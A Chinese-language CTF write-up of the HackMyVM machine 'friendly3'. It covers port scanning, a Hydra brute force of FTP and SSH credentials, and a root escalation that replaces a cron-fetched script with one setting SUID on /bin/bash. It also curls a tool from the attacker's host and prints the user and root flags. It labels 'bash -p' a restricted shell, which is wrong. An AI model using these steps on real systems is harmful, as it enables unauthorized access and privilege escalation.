hmv.friendly3

信息搜集

主机扫描

arp-scan -l

端口扫描

┌──(root㉿kali)-[~]
└─# nmap -sV -p- -Pn  192.168.152.107
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-26 03:30 EDT
Nmap scan report for 192.168.152.107
Host is up (0.00066s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2 (protocol 2.0)
80/tcp open  http    nginx 1.22.1
MAC Address: 08:00:27:28:42:D2 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.16 seconds
                                                                    

匿名登录ftp端口，错误，无法登录，但网站提示我了，内容在ftp中

路径扫描

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -t 100 -b 403,404 -x php,*  -u http://192.168.152.107

什么都没有扫到，于是从网站页面找找

爆破ftp用户及密码

┌──(root㉿kali)-[~]
└─# hydra -l juan -P /usr/share/wordlists/rockyou.txt  ftp://192.168.152.107
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-26 04:25:14
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.152.107:21/
[21][ftp] host: 192.168.152.107   login: juan   password: alexis
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-26 04:25:53

成功登陆ftp，可没什么东西

拿取shell

那就试试ssh看能不能登录，或者爆破ssh

hydra -L user.txt -P /rockyou.txt ssh://ip

成功拿到shell
user.txt
cb40b159c8086733d57280de3f97de30

提权

1. /home目录下有一个blue用户，搜集信息什么都没有
2. sudo -l 用不了
3. 查看网站根目录，发现一个bash文件

4. 查看定时文件/etc/crontab,什么都没有，好吧，

既然这样，上传分析一下，发现没有wget命令，查看师傅的wp有两种方法：

1. busybox wget 第一次见
2. curl -X GET http://kali ip:8000/pspy64 -o pspy64 这个给忘了，下载文件

发现定时文件每分钟执行一次：我们发现uid(用户表示符)为0，说明是以root运行，通过设置suid我们让bash以文件所有者执行 (ps: pid是进程的标识符)

juan@friendly3:/opt$ cat check_for_install.sh 
#!/bin/bash


/usr/bin/curl "http://127.0.0.1/9842734723948024.bash" > /tmp/a.bash

chmod +x /tmp/a.bash
chmod +r /tmp/a.bash
chmod +w /tmp/a.bash

/bin/bash /tmp/a.bash

rm -rf /tmp/a.bash

于是我们利用改变a.bash，从而给/bin/bash给我们使用权

1. a.bash
#!/bin/bash
chmod u+s /bin/bash
chmod u+s /bin/bash 的意思是给 /bin/bash 文件设置 Setuid 权限，并且这个权限只会应用于用户（owner），也就是文件的所有者。
我们创建了一个a.bash文件，以/bin/bash为解释器，执行文件,给文件加上suid权限，以文件所有者执行

2. bash -p
启动一个受限的bash

获得root.txt：

eb9748b67f25e6bd202e5fa25f534d51